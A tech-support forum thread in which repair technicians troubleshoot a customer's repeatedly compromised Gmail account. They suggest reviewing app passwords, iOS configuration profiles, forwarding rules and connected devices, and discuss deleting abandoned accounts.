Customer was hacked, hacker keeps regaining access

[Big Jim]

Not sure how the original hack happened, but the hacker gained access to customer's icloud account and left a weird message in the notes app, also had access to her gmail account. She had all her account passwords stored in notes so went about changing them all and writing them down on paper.

This is the point she brought it to me, I turned on 2 factor on her main accounts, (icloud/microsoft), she already had login by phone activated on gmail.

on her phone and tablet (iphone/ipad), she gets a popup banner at the bottom of outlook saying she needs to login to her gmail account, when she does so the "hacker" is able to regain access to her account, I went through all of the security etc with her for about an hour, just now had a call that she logged in using this popup and got a notification that the unknown (to her) mac had logged in to her account again.

so she is now going through the process of changing all her passwords again, whilst I try and work out what this pop-up is, it only appears in outlook (which she uses to access her mail) and its on both phone and tablet, I haven't ruled a virus out completely but it doesn't sound like a virus to me.
If I try and login to her gmail account on a new device it needs to use her phone to access it.
We changed the gmail account password when she came in to my shop, I don't understand how the hacker is able to regain access constantly without a password.

 

[nlinecomputers]

Keylogger. Nuke the mac. Nuke the router. Go into the iCloud account and delete all devices. Do the same for gmail.

 

[Blues]

If they have her account setup on another iOS device that may be it she may need to login and deauthorize all devices to ensure they don't have access on another iOS device.

 

[Markverhyden]

Just to be clear she doesn't have a PC, as in macOS or Winderz, only iOS devices? Did you turn off iCloud sharing/backup on all devices? Did you check the installed apps on the phone? Did you check local settings on the Outlook app. Personally I'd get rid of Outlook. It's best used with Exchange. Use the gmail app or the iOS Mail app.

 

[Big Jim]

she has a PC an iPad and an iphone
Her PC hasn't been used for a year, the only devices showing in her gmail account were her phone, tablet and my computer when I was checking gmail settings and security for her.

The mac in question is the rogue device.
It keeps getting logged back in to her gmail account. She removes the device from gmail straight away every time it happens, but the pop-up keeps happening in the outlook app on both phone and iPad

so at this moment in time the issue isn't icloud its the gmail account, icloud has now been secured with a new password and 2 factor.
the pop-up isn't a separate app (as far as I can tell) its a pop-up in the outlook app asking her to login to the gmail account, this then re-authorises the hacker's mac somehow.
How would the mac regain access without the new password ?

I have asked her to send me screenshots next time it happens.
She has already mentioned abandoning the gmail account and starting a new one, so perhaps that is the solution.

 

[nlinecomputers]

Account settings: Your browser is not supported.

myaccount.google.com

 

[nlinecomputers]

Gmail app password. Use above link to check EVERYTHING!

 

[timeshifter]

Look for Profiles installed on her iPhone and iPad.

 

[Big Jim]

Look for Profiles installed on her iPhone and iPad.

profiles ?

 

[alexsmith2709]

check the link that @nlinecomputers posted and remove any devices that she doesnt own. Has she ever used any app passwords that have been generated by Gmail to allow her to use outlook? Its a separate password from the account password but allows "authorised" apps to login. Look in "third party access" to check this and remove anything that doesnt need to be there.

 

[nlinecomputers]

check the link that @nlinecomputers posted and remove any devices that she doesnt own. Has she ever used any app passwords that have been generated by Gmail to allow her to use outlook? Its a separate password from the account password but allows "authorised" apps to login. Look in "third party access" to check this and remove anything that doesnt need to be there.

I'm paranoid. I'd just nuke all of them and recreate any you need. Most users should have none or only for older versions of Outlook.

 

[timeshifter]

profiles ?

Install or remove configuration profiles on iPhone

On iPhone, install configuration profiles for settings used by corporate or school networks or accounts.

support.apple.com

I've cleaned these up a few times. Usually an old person. I find an email account in their phone that has some weird address, like weather related service or something. You can't remove it. Of course they don't know how it got there. Then I find a profile that was installed and remove it. Then I can remove the rogue email account.

Possible something like that is in play.

 

[bdeustis]

profiles ?

Installable preferences that show in System Preferences. See Remove sys pref

 

[VISA MC]

This happens a lot in outlook but I’m sure it’s possible in gmail too. Check the mail forwarding rules.

We have seen a number of hacks where they set the rules to archive messages immediately and forward to an external account so even if changing the password or 2FA, as long as that forward is in place they can still receive the reset emails for other accounts. I’ve even seen one where the rules were so specific like if the subject line contained “password” or “reset” archive and forward. All other mail goes to the inbox and the end user is none the wiser.

 

[Big Jim]

Thanks for the help guys, customer has opted to setup a new gmail account instead.
I advised her that we really should secure this account anyway but she hasn't replied to my email.

 

[nlinecomputers]

Well unless she hard deletes the account that will not solve anything. The hacker still has access and can mine it for data and nobody remembers to update ALL of your finance accounts with the new email address . You can’t just walk away.

How do I delete my Google Account? - Google Account Help

You can delete your Google Account at any tim

support.google.com

 

[britechguy]

I honestly don't understand, whether hacking is involved or not, how people can just walk away from email accounts that they actually used extensively for years rather than deleting them.

If you have no intention of using an email account, particularly if it's one you actually did use rather than establishing it as a "junk email trap," then delete the thing. It's a kindness to your infrequent mailers, too, as they'll then get a bounce message and make the effort to look you up if they so desire. Letting people believe they've reached you, and getting no response back, is not a good look.

 

[VISA MC]

Well unless she hard deletes the account that will not solve anything. The hacker still has access and can mine it for data and nobody remembers to update ALL of your finance accounts with the new email address . You can’t just walk away.

How do I delete my Google Account? - Google Account Help

You can delete your Google Account at any tim

support.google.com

I was curious so I did some digging to confirm. Once it’s deleted it can NOT be remade. You didn’t indicate that, but it reminded me of a creative way we recovered a clients domain a few years back.

I rebought the domain and recreated the end user’s email using my hosting providers free we mail. Retrieved the password reset email and recovered their domains.

I was curious if someone else would be able to recreate an old gmail account. Turns out they thought that one through.

 

[britechguy]

I know this is meandering way off-topic, but when it comes to the free e-mail services, it's something worth considering: What do they allow your executor to do after your passing? [This may even need to be checked as far as paid services.]

Google has (or had, but I don't think it's changed) the policy of granting executors of estates access to the email accounts that were owned by the person you're the executor for. Yahoo (which, now, who cares, but the principle applies) did not and would not.

Having been in this role now, twice, one of the duties I feel I have is "closing out" accounts, including email accounts, after the period of time where any possible business transactions that might flow through them would have already done so. Typically, that means about a year or so after the date of death.

One thing that it seems most people aren't taking any notice of is what happens to their cyber-world, including things like email accounts, Facebook, etc., after their passing. Those things really do need to be considered.

 

[Big Jim]

Well unless she hard deletes the account that will not solve anything. The hacker still has access and can mine it for data and nobody remembers to update ALL of your finance accounts with the new email address . You can’t just walk away.

How do I delete my Google Account? - Google Account Help

You can delete your Google Account at any tim

support.google.com

I haven't walked away, the client has, I responded to tell her that she/we need(s) to secure the old address and she has ignored me thus far.